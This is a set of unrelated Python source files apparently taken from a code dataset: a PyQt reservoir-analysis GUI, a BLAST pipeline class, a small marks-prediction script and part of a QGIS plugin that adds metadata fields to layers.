self.ui.tableWidget.setItem(i-1, 0,item)\n\n # layer number\n listrow.append(self.qlqTable[i][\"floor\"])\n item = 
QTableWidgetItem(self.qlqTable[i][\"floor\"])\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget.setItem(i-1, 1,item)\n\n # areal extent\n listrow.append(self.qlqTable[i][\"area\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"area\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget.setItem(i-1, 2,item)\n\n # average oil saturation\n listrow.append(self.qlqTable[i][\"avBhd\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"avBhd\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget.setItem(i-1, 3,item)\n\n # average effective thickness\n listrow.append(self.qlqTable[i][\"avYxhd\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"avYxhd\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget.setItem(i-1, 4,item)\n\n # average permeability\n listrow.append(self.qlqTable[i][\"avStl\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"avStl\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget.setItem(i-1, 5,item)\n\n # average porosity\n listrow.append(self.qlqTable[i][\"avKxd\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"avKxd\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget.setItem(i-1, 6,item)\n\n # remaining oil volume\n listrow.append(self.qlqTable[i][\"syyl\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"syyl\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget.setItem(i-1, 7,item)\n\n # well count\n listrow.append(len(self.qlqTable[i][\"well\"]))\n item = QTableWidgetItem(str(len(self.qlqTable[i][\"well\"])))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget.setItem(i-1, 8,item)\n\n # average water-flooding degree\n # NOTE: when avsycd is \"\" nothing is appended, so listrow may end up one element short\n if self.qlqTable[i][\"avsycd\"] == \"高\":\n listrow.append(3)\n if self.qlqTable[i][\"avsycd\"] == \"中\":\n listrow.append(2)\n if self.qlqTable[i][\"avsycd\"] == \"低\":\n listrow.append(1)\n item = QTableWidgetItem(str(self.qlqTable[i][\"avsycd\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget.setItem(i-1, 9,item)\n\n # a = random.randrange(0, 2, 1)\n # listrow.append(a)\n self.qlqTableList.append(listrow)\n\n\n\n\n\n\n\n\n @pyqtSlot()\n def on_pushButton_clicked(self):\n\n comBoxText = self.ui.comboBox.currentText()\n\n title = comBoxText + \"潜力区\"\n fig1 = QmyFigure(self)\n fig1.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig1, title) # add to the tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n\n\n ax1 = fig1.fig.add_subplot(1, 1, 1) # subplot 1\n ax1.set_xlabel('X 轴') # X-axis title\n ax1.set_ylabel('Y 轴') # Y-axis title\n ax1.set_title(title)\n\n im1 = ax1.pcolormesh(self.qlqXb[comBoxText], self.qlqYb[comBoxText], self.qlqBinary[comBoxText])\n
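 # skimage's find_contours returns (row, col) pairs; on_pushButton_3 already\n # rescaled them into map coordinates, so the overlay loop below plots the\n # column values (contour[:, 1]) as x and the row values (contour[:, 0]) as y.\n 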
fig1.fig.colorbar(im1, ax=ax1)\n\n\n\n for n, contour in enumerate(self.qlqContours[comBoxText]):\n\n ax1.plot(contour[:, 1], contour[:, 0], linewidth=2)\n\n print(\"pushButton\")\n\n @pyqtSlot(str) # runs when the inter-layer connectivity combo box selection changes\n def on_comboBox_2_activated(self, curText):\n\n comBoxzhi = int(self.ui.comboBox_2.currentText())\n\n # print(self.qlqTableList)\n # print(self.qlqTable[comBoxzhi][\"well\"])\n\n CJLTX = [] # inter-layer connectivity\n CJLTXTJ = [] # inter-layer connectivity statistics\n\n blt = 0 # not connected\n slt = 0 # connected above\n xlt = 0 # connected below\n jlt = 0 # connected above and below\n\n if len(self.qlqTable[comBoxzhi][\"well\"]) == 0:\n print('潜力区内无注采井')\n else:\n for i in range(len(self.qlqTable[comBoxzhi][\"well\"])):\n CJLTX1 = []\n CJLTX1.append(self.qlqTable[comBoxzhi][\"well\"][i])\n bj = 0\n bj1 = 0\n for j in range(1,len(CJDYZB)):\n if self.qlqTable[comBoxzhi][\"well\"][i] == (CJDYZB[str(j)][0][2]):\n ch = CJDYZB[str(j)][0][3] + \"-\" + CJDYZB[str(j)][0][4] # merged layer number\n if ch == self.qlqTableList[comBoxzhi][1]:\n bj = bj + 1\n if bj == 1:\n for k in range(j-1,j-50,-1):\n if bj1 == 0:\n if CJDYZB[str(k)][0][9] != 0:\n bj1 = bj1 + 1\n CJLTX1.append(float(CJDYZB[str(k)][0][8]) + float(CJDYZB[str(k)][0][9]))\n CJLTX1.append(float(CJDYZB[str(j)][0][8]))\n CJLTX1.append(float(CJDYZB[str(j)][0][8]) + float(CJDYZB[str(j)][0][9]))\n if CJDYZB[str(j+1)][0][8] != 0:\n CJLTX1.append(float(CJDYZB[str(j+1)][0][8]))\n elif CJDYZB[str(j)][0][8] == '0':\n if CJDYZB[str(j+1)][0][8] != 0:\n CJLTX1[4] = float(CJDYZB[str(j+1)][0][8])\n elif CJDYZB[str(j)][0][8] != '0':\n CJLTX1[3] = float(CJDYZB[str(j)][0][8]) + float(CJDYZB[str(j)][0][9])\n if CJDYZB[str(j+1)][0][8] != 0:\n CJLTX1[4] = float(CJDYZB[str(j + 1)][0][8])\n\n # connectivity code: 0 = not connected, 1 = connected above, 2 = connected below, 3 = connected both ways (gap threshold 0.5)\n if CJLTX1[2] != []:\n if CJLTX1[2] - CJLTX1[1] > 0.5:\n if CJLTX1[4] - CJLTX1[3] > 0.5:\n CJLTX1.append(0)\n blt = blt + 1\n else:\n CJLTX1.append(2)\n xlt = xlt + 1\n else:\n if CJLTX1[4] - CJLTX1[3] > 0.5:\n CJLTX1.append(1)\n slt = slt + 1\n else:\n CJLTX1.append(3)\n jlt = jlt + 1\n CJLTX.append(CJLTX1)\n # print(CJLTX1) # per-well inter-layer connectivity data\n CJLTXTJ.append('上下不连通')\n CJLTXTJ.append(blt)\n CJLTXTJ.append('上连通')\n CJLTXTJ.append(slt)\n CJLTXTJ.append('下连通')\n CJLTXTJ.append(xlt)\n CJLTXTJ.append('上下均连通')\n CJLTXTJ.append(jlt)\n\n print(CJLTX) # connectivity table for all wells in the selected potential zone\n print(CJLTXTJ) # connectivity statistics for all wells in the selected potential zone\n\n headerText = [\"包含井号\", \"上层砂岩底深\", \"砂岩顶深\", \"砂岩底深\", \"下层砂岩顶深\", \"层间连通性\"]\n self.ui.tableWidget_3.setColumnCount(len(headerText))\n self.ui.tableWidget_3.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget_3.clearContents()\n self.ui.tableWidget_3.setRowCount(len(CJLTX))\n self.ui.tableWidget_3.setAlternatingRowColors(True)\n\n\n for i in range(0,len(CJLTX)):\n for j in range(0,len(CJLTX[0])):\n\n item = QTableWidgetItem(str(CJLTX[i][j]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_3.setItem(i, j, item)\n\n\n headerText = [\"连通情况\", \"潜力区井数量\"]\n self.ui.tableWidget_2.setColumnCount(len(headerText))\n self.ui.tableWidget_2.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget_2.clearContents()\n self.ui.tableWidget_2.setRowCount(4)\n self.ui.tableWidget_2.setAlternatingRowColors(True)\n\n\n item = QTableWidgetItem(str(CJLTXTJ[0]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_2.setItem(0, 0, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[1]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n 
item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_2.setItem(0, 1, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[2]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_2.setItem(1, 0, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[3]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_2.setItem(1, 1, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[4]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_2.setItem(2, 0, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[5]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_2.setItem(2, 1, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[6]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_2.setItem(3, 0, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[7]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_2.setItem(3, 1, item)\n\n # thick-layer identification button\n @pyqtSlot()\n def on_pushButton_11_clicked(self):\n\n HCSBB1 = [] # thick-layer table; wells without thick layers are removed\n CJDYJH = [] # sedimentary-unit well numbers\n pross = 1\n\n for i in range(1,len(CJDYZB)):\n if i == 1:\n CJDYJH.append(CJDYZB[str(i)][0][2])\n else:\n if CJDYJH[len(CJDYJH)-1] != CJDYZB[str(i)][0][2]:\n CJDYJH.append(CJDYZB[str(i)][0][2])\n\n\n labText = \"正在厚层识别...\" # label text\n btnText = \"取消\" # caption of the \"Cancel\" button\n minV = 0\n maxV = len(CJDYJH)\n\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"厚层识别\")\n dlgProgress.setWindowModality(Qt.WindowModal) # modal dialog\n dlgProgress.setAutoReset(True) # reset() is called automatically when value() reaches the maximum\n dlgProgress.setAutoClose(True) # hide the dialog when reset() is called\n\n\n for i in range(len(CJDYJH)):\n\n dlgProgress.setValue(pross)\n dlgProgress.setLabelText(\"正在分析第 %d 口井\" %pross)\n\n ch = []\n HCSBB = []\n HCSBB.append(CJDYJH[i])\n syhd = 0 # sandstone thickness, accumulates the thickness of stacked thick layers\n yxhd = 0 # effective thickness, accumulates the effective thickness of stacked thick layers\n bj = 0 # flag marking whether the well has more than one thick-layer segment\n bj1 = 0 # flag used to skip zero-valued rows\n\n for j in range(1,len(CJDYZB)):\n if CJDYJH[i] == CJDYZB[str(j)][0][2]:\n a = float(CJDYZB[str(j)][0][8]) # first sandstone top depth\n if a != 0: # the first sandstone top depth must not be zero\n b = float(CJDYZB[str(j)][0][9]) # first sandstone layer thickness\n d = float(CJDYZB[str(j)][0][13]) # first effective thickness\n\n c = float(CJDYZB[str(j+1)][0][8]) # second sandstone top depth\n\n for m in range(j+2, j+20):\n if bj1 == 0:\n if c == 0: # the second sandstone top depth must not be zero\n c = float(CJDYZB[str(m)][0][8])\n else:\n bj1 = 1\n\n if c == a + b: # condition: second top depth == first top depth + first layer thickness\n ch.append(CJDYZB[str(j)][0][3] + \"-\" + CJDYZB[str(j)][0][4]) # merged layer number of the first sandstone top depth\n syhd = syhd + b\n yxhd = yxhd + d\n else:\n if syhd >= 5:\n if bj == 0:\n ch.append(CJDYZB[str(j)][0][3] + \"-\" + CJDYZB[str(j)][0][4]) # merged layer number of the first sandstone top depth\n HCSBB.append(syhd)\n HCSBB.append(yxhd)\n for n in range(len(ch)):\n HCSBB.append(ch[n])\n bj = 1\n ch = []\n syhd = 0\n yxhd = 0\n print(HCSBB)\n else:\n HCSBB1.append(HCSBB)\n HCSBB = []\n HCSBB.append(CJDYJH[i])\n ch.append(CJDYZB[str(j)][0][3] + \"-\" + CJDYZB[str(j)][0][4]) # merged layer number of the first sandstone top depth\n 
HCSBB.append(syhd)\n HCSBB.append(yxhd)\n for n in range(len(ch)):\n HCSBB.append(ch[n])\n bj = 1\n ch = []\n syhd = 0\n yxhd = 0\n else:\n ch = []\n syhd = 0\n yxhd = 0\n\n if len(HCSBB) != 1:\n HCSBB1.append(HCSBB)\n print(HCSBB1)\n\n pross = pross + 1\n\n print(HCSBB1)\n\n headerText = [\"井号\", \"总砂岩厚度\",\"总有效厚度\",\"层位1\",\"层位2\",\"层位3\",\"层位4\",\"层位5\",\"层位6\"]\n self.ui.tableWidget_5.setColumnCount(len(headerText))\n self.ui.tableWidget_5.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget_5.clearContents()\n self.ui.tableWidget_5.setRowCount(len(HCSBB1))\n self.ui.tableWidget_5.setAlternatingRowColors(True)\n\n for i, row in enumerate(HCSBB1):\n for j, a in enumerate(row):\n item = QTableWidgetItem(str(a))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_5.setItem(i, j, item)\n\n # random-forest model button\n @pyqtSlot()\n def on_pushButton_4_clicked(self):\n Y = []\n for i, _ in enumerate(self.qlqTableList):\n Y.append(random.randrange(0, 2, 1)) # placeholder labels: random 0/1 targets stand in for real evaluations\n\n # use 10 weak learners (trees)\n self.model = RandomForestClassifier(n_estimators=10, random_state=123)\n X = [row[2:] for row in self.qlqTableList]\n self.model.fit(X, Y)\n\n dlgTitle = \"提示\"\n strInfo = \"模型已经被正确导入.\"\n QMessageBox.information(self, dlgTitle, strInfo)\n\n # print(model.predict(X))\n\n @pyqtSlot()\n def on_pushButton_5_clicked(self):\n X = [row[2:] for row in self.qlqTableList]\n Y = self.model.predict(X)\n headerText = [\"潜力区序号\", \"层号\", \"平面规模\", \"平均含油饱和度\", \"平均有效厚度\", \"平均渗透率\",\"平均孔隙度\",\"剩余油量\",\"井数量\",\"平均水淹程度\",\"随机森林评价\"]\n self.ui.tableWidget_4.setColumnCount(len(headerText))\n self.ui.tableWidget_4.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget_4.clearContents()\n self.ui.tableWidget_4.setRowCount(len(self.qlqTableList))\n self.ui.tableWidget_4.setAlternatingRowColors(True)\n\n for i, row in enumerate(self.qlqTableList):\n\n for j, a in enumerate(row):\n\n item = QTableWidgetItem(str(a))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_4.setItem(i, j, item)\n\n item = QTableWidgetItem(str(Y[i]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n self.ui.tableWidget_4.setItem(i, 10, item)\n\n print(\"评价完成\")\n\n\n\n\n\n\n\nif __name__ == \"__main__\": # for standalone testing of this window\n app = QApplication(sys.argv) # create the GUI application\n form = QmyMainWindow() # create the main window\n form.show()\n sys.exit(app.exec_())\n","repo_name":"jiangdaisy/Complex_structure_well_design_software","sub_path":"CSW_sjk_Slot.py","file_name":"CSW_sjk_Slot.py","file_ext":"py","file_size_in_byte":69081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"2577809067","text":"# File: blast.py\n# Author: Harrison Inocencio\n# Date: 07-24-18\n# Purpose: Contains the blastBranch object, which runs all operations\n#\t\t related to the pipe's BLAST branch\n\n# Notes:\n# 1.\n# 2.\n# 3.\n# 4.\n# 5.\n\n# TODO:\n# 1. 
\n# 2.\n# 3.\n# 4.\n# 5.\n\n# -------------------------------------------------------------------\n\nimport os\nimport subprocess\nimport lib.args as args\nimport lib.plumber as plumber\nfrom Bio import SeqIO\nfrom lib.qSeq import qSeq\n\n# blastBranch class\nclass blastBranch:\n\t\"\"\"\n\tThis class contains all atr/functions needed to execute the blast\n\tbranch portion of the pipeline. Generates BLAST databases, blastn \n\truns, and exports reports\n\t\"\"\"\n\n\t# __init__ func\n\t# Initializes passed attributes\n\tdef __init__(self, blast_path, sample_pit, query_fpath):\n\t\tself.base_blast_path = blast_path\n\t\tself.sample_pit = sample_pit\n\t\tself.query_fpath = query_fpath\n\t\tself.db_bucket = []\n\t\tself.qSeq_list = []\n\n\t# __format_id func\n\t# Replaces periods/spaces in the passed id with underscores and returns the new id\n\t# Used for creating the listed query file names\n\tdef __format_id(self, rec_id):\n\t\tnew_id = \"\"\n\t\tfor char in rec_id:\n\t\t\tif char != '.' and char != \" \":\n\t\t\t\tnew_id+=char\n\t\t\telse:\n\t\t\t\tnew_id+='_'\n\n\t\treturn new_id\n\n\t# __split_queries func\n\t# Splits the query fasta entries into individual files for blasting\n\t# returns the list of query file paths\n\tdef __split_queries(self):\n\t\tquery_recs = []\n\t\tfor rec in SeqIO.parse(self.query_fpath, \"fasta\"):\n\t\t\tquery_recs.append(rec)\n\t\n\t\tquery_list = []\n\t\tquery_path = self.base_blast_path + args.query_dir\n\t\tplumber.force_dir(query_path)\n\t\tfor rec in query_recs:\n\t\t\twrite_out = [rec]\n\t\t\twrite_path = query_path+self.__format_id(rec.id)+\".fasta\"\n\t\t\tSeqIO.write(write_out, write_path, \"fasta\")\n\t\t\tquery_list.append(write_path)\n\t\t\t\n\t\treturn query_list\n\n\t# __gen_db_path func\n\t# creates the blast database directory for a passed sampleBall\n\t# returns the complete db name for the makeblastdb process\n\tdef __gen_db_path(self, sball, bucket_path):\n\t\tdir_name = os.path.basename(sball.export_fasta).split(\".\")[0]\n\t\tdir_name += \"_db/\"\n\t\tdb_name = os.path.basename(sball.export_fasta).split(\".\")[0]\n\t\tdb_name += \"_genome.fasta\"\n\t\tdir_path = bucket_path + dir_name\n\t\tplumber.force_dir(dir_path)\n\t\t\n\t\treturn dir_path + db_name\n\n\t# __build_bucket func\n\t# builds blast databases from all samples in sample_pit\n\t# sets the db_bucket atr\n\tdef __build_bucket(self):\n\t\tbucket_path = self.base_blast_path + args.bucket_dir\n\t\tplumber.force_dir(bucket_path)\n\t\tfor sball in self.sample_pit:\n\t\t\tprint(\"\\t\\tMaking database for sample\", sball.sample_id)\n\t\t\tout_path = self.__gen_db_path(sball, bucket_path)\n\t\t\tblast_cmd = [\"makeblastdb\", \"-in\", sball.export_fasta,\n\t\t\t\t\t\t\"-dbtype\", \"nucl\", \"-out\", out_path]\n\t\t\ttry:\n\t\t\t\tblast_ret = subprocess.run(blast_cmd, \n\t\t\t\t\t\t\t\t\t\tstdout=subprocess.PIPE,\n\t\t\t\t\t\t\t\t\t\tstdin=subprocess.PIPE, check=True,\n\t\t\t\t\t\t\t\t\t\tuniversal_newlines=True)\n\t\t\texcept subprocess.CalledProcessError as perror:\n\t\t\t\traise RuntimeError(\"ERROR: makeblastdb failed!\") from perror\n\n\t\t\tself.db_bucket.append(out_path)\n\n\t# __build_qSeqs func\n\t# Builds a list of all qSeq objects using query_list and the db_bucket\n\tdef __build_qSeqs(self, query_list):\n\t\tfor query_path in query_list:\n\t\t\tnew_qSeq = qSeq(query_path, self.db_bucket)\n\t\t\tself.qSeq_list.append(new_qSeq)\n
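\n\t# Orientation note: bucket_blast, convert_hr_reports and get_sub_seqs live in\n\t# lib/qSeq.py (not shown here). Judging from the archive/report split they\n\t# presumably wrap NCBI BLAST+ in its archive workflow, roughly\n\t# blastn -query <query.fasta> -db <db> -outfmt 11 -out <archive>\n\t# followed by blast_formatter for the human-readable reports; this is an\n\t# assumption from the surrounding code, not a confirmed implementation.\n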
\n\t# __blast_all func\n\t# Calls the bucket_blast function on each qSeq obj in qSeq_list\n\tdef __blast_all(self):\n\t\tarchive_path = self.base_blast_path + args.archive_dir\n\t\tplumber.force_dir(archive_path)\n\t\tfor query in self.qSeq_list:\n\t\t\tprint(\"\\t\\tBlasting %s against bucket ...\" % query.query_name)\n\t\t\tquery.bucket_blast(archive_path)\n\n\t# __gen_hr_reports func\n\t# Converts the archive to human readable reports\n\tdef __gen_hr_reports(self):\n\t\treports_path = self.base_blast_path + args.report_dir\n\t\tplumber.force_dir(reports_path)\n\t\tfor query in self.qSeq_list:\n\t\t\tprint(\"\\t\\tBuilding reports for %s ...\" % query.query_name)\n\t\t\tquery.convert_hr_reports(reports_path)\n\n\t# __extract_sub_seqs func\n\t# Extracts the hit subject sequences and writes them\n\t# to their own fastas\n\tdef __extract_sub_seqs(self):\n\t\tsub_seq_path = self.base_blast_path + args.sub_seq_dir\n\t\tplumber.force_dir(sub_seq_path)\n\t\tfor query in self.qSeq_list:\n\t\t\tprint(\"\\t\\tExtracting subject sequences for %s ...\" % query.query_name)\n\t\t\tquery.get_sub_seqs(sub_seq_path)\n\n\t# run func\n\t# Starts the blast branch\n\tdef run(self):\n\t\tprint(\"\\tBLASTER alive and running ...\")\n\t\tprint(\"\\tSplitting queries ...\")\n\t\tquery_list = self.__split_queries()\n\t\tprint(\"\\tBuilding database bucket ...\")\n\t\tself.__build_bucket()\n\t\tself.__build_qSeqs(query_list)\n\t\tprint(\"\\tBeginning bucket blasts ...\")\n\t\tself.__blast_all()\n\t\tprint(\"\\tBuilding HR reports ...\")\n\t\tself.__gen_hr_reports()\n\t\tprint(\"\\tExtracting subject seq fastas ...\")\n\t\tself.__extract_sub_seqs()\n","repo_name":"hain222/bio-pipe","sub_path":"lib/blast.py","file_name":"blast.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"8388639463","text":"#THIS IS THE FILE WHERE YOU CREATE AN EXECUTABLE FILE OF THE MAIN LOGIC (PART 1 FILE), WHICH WILL BE USED FURTHER WHILE CREATING A USER INTERFACE.\r\n#IN THAT WE SIMPLY HAVE TO IMPORT THE FILE.\r\nimport pickle\r\n\r\nwith open(\"sm.model\", \"rb\") as f:\r\n\tmodel = pickle.load(f)\r\n\r\n#prediction\r\nno_courses = float(input(\"Enter the no of courses : \"))\r\nti_std = float(input(\"Enter the time you study in a day (in hr) : \"))\r\nmarks = model.predict([[no_courses, ti_std]])\r\nprint(\"\\n================================Marks obtained=============================\\n\")\r\nprint(\"If you study \", no_courses, \"courses for \", ti_std, \"hr per day then you will score \", marks, \"marks.\")\r\n","repo_name":"Rohanpophale/ML-FLASK-BASED-STUDENT-MARKS-PREDICTION-WEB-APPLICATION","sub_path":"PART 2.py","file_name":"PART 2.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"5962870097","text":"from qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication\nfrom qgis.PyQt.QtGui import QIcon\nfrom qgis.PyQt.QtWidgets import QAction\nfrom qgis.core import Qgis\nfrom qgis.utils import iface\nfrom qgis.core import QgsProject\nfrom qgis.core import QgsMapLayer\nfrom qgis.core import QgsVectorLayer\nfrom qgis.core import QgsWkbTypes\nfrom qgis.core import QgsField\nfrom qgis.core import QgsDefaultValue\nfrom qgis.core import QgsMessageLog\nfrom qgis.gui import QgsMessageBar\nfrom qgis.PyQt.QtCore import QVariant\n\n# Initialize Qt resources from file resources.py\nfrom .resources import *\nimport os.path\n\ndef checkAttributes(layer, geometryType):\n\n    # Check if layer is editable\n    if not layer.isEditable():\n        if not layer.startEditing():\n            iface.messageBar().pushMessage(\"Error\", \"Layer is not editable\", 
level=Qgis.Critical, duration=5)\n            return\n    # Check if author is present\n    checkAttribute(layer, 'author','Author', QVariant.String, '@user_full_name', False)\n    checkAttribute(layer, 'created','Date Created', QVariant.DateTime, 'now()', False)\n    checkAttribute(layer, 'updated','Date Updated', QVariant.DateTime, 'now()', True)\n\n    if geometryType == QgsWkbTypes.LineGeometry:\n        checkAttribute(layer, 'length','length', QVariant.Int, '$length', True)\n        updateAttribute(layer, 'length')\n    \n    if geometryType == QgsWkbTypes.PolygonGeometry:\n        checkAttribute(layer, 'area','area', QVariant.Double, 'round($area/10000,4)', True)\n        updateAttribute(layer, 'area')\n    \n    layer.updateFields()\n    # Save the changes\n    layer.commitChanges()\n\n\ndef setReadOnlyAttribute(layer, attribute_index):\n    form_config = layer.editFormConfig()\n    form_config.setReadOnly(attribute_index, True)\n    layer.setEditFormConfig(form_config)\n\ndef checkAttribute(layer, attribute_name, alias, attribute_type, default_value, applyOnUpdate, readOnly = True):\n    # Check if attribute is present\n    attributeIndex = layer.fields().indexFromName(attribute_name)\n    aliasIndex = layer.fields().indexFromName(alias)\n    if attributeIndex == -1 and aliasIndex == -1:\n        print(\"Layer \" + layer.name() + \" does not have attribute \" + attribute_name + \" or alias \" + alias)\n        # If the attribute isn't present and the alias is also not present, create the column\n        if layer.addAttribute(QgsField(attribute_name, attribute_type)):\n            print(\"Layer \" + layer.name() + \" created attribute \" + attribute_name)\n            attributeIndex = layer.fields().indexFromName(attribute_name) \n            setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly)\n            # Set the friendly alias for the layer\n            setAlias(layer, attributeIndex, alias)\n        # Shapefiles cannot store DateTime fields, so fall back to Date\n        elif (attribute_type == QVariant.DateTime):\n            print(\"Layer \" + layer.name() + \" did not create attribute \" + attribute_name + \" as a DateTime, possibly because the file is a shapefile; retrying as a Date\")\n            checkAttribute(layer, attribute_name,alias, QVariant.Date, default_value, applyOnUpdate, readOnly)\n        else:\n            iface.messageBar().pushMessage(\"Error\", \"Error creating attribute \" + attribute_name, level=Qgis.Critical, duration=5)\n            return\n    else:\n        attributeIndex = max(attributeIndex, aliasIndex)\n        # If the attribute is present already, confirm the data type\n        if layer.fields().field(attributeIndex).type() != attribute_type:\n            # If the data type is wrong, delete the column and create it again\n\n            # Check whether the data type is a DateTime, but the column is a Date\n            if (layer.fields().field(attributeIndex).type() == QVariant.Date and attribute_type == QVariant.DateTime):\n                print(\"Layer \" + layer.name() + \" has attribute \" + attribute_name + \" as a Date, so it may be a shapefile, we'll just make sure the default value is set\")\n                setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly)\n            \n            # Otherwise, delete the column and create it again\n            elif (layer.deleteAttribute(attributeIndex)):\n                \n                if (layer.addAttribute(QgsField(attribute_name, attribute_type))):\n                    attributeIndex = layer.fields().indexFromName(attribute_name)\n                    print(\"Layer \" + layer.name() + \" created attribute \" + attribute_name + \" after deleting the previous one, because the data types didn't match\")\n                    # Set the default values for the form\n                    setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly)\n                    # Set the default values for existing geometry\n                    updateAttribute(layer, attribute_name)\n        else:\n            # If the data type is correct, set the default values for the form\n            print(\"Layer \" + layer.name() + \" has attribute \" + attribute_name + \" with the correct data type, so we're just going to update the default values\")\n            setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly)\n
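\n# The default_value strings passed to checkAttribute above are QGIS expression\n# strings, evaluated when a feature is created (or updated, with applyOnUpdate):\n# '@user_full_name' -> the configured user name, 'now()' -> current timestamp,\n# '$length' -> geometry length, 'round($area/10000,4)' -> area in hectares\n# (assuming a metric CRS; the /10000 conversion is this plugin's own convention).\n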
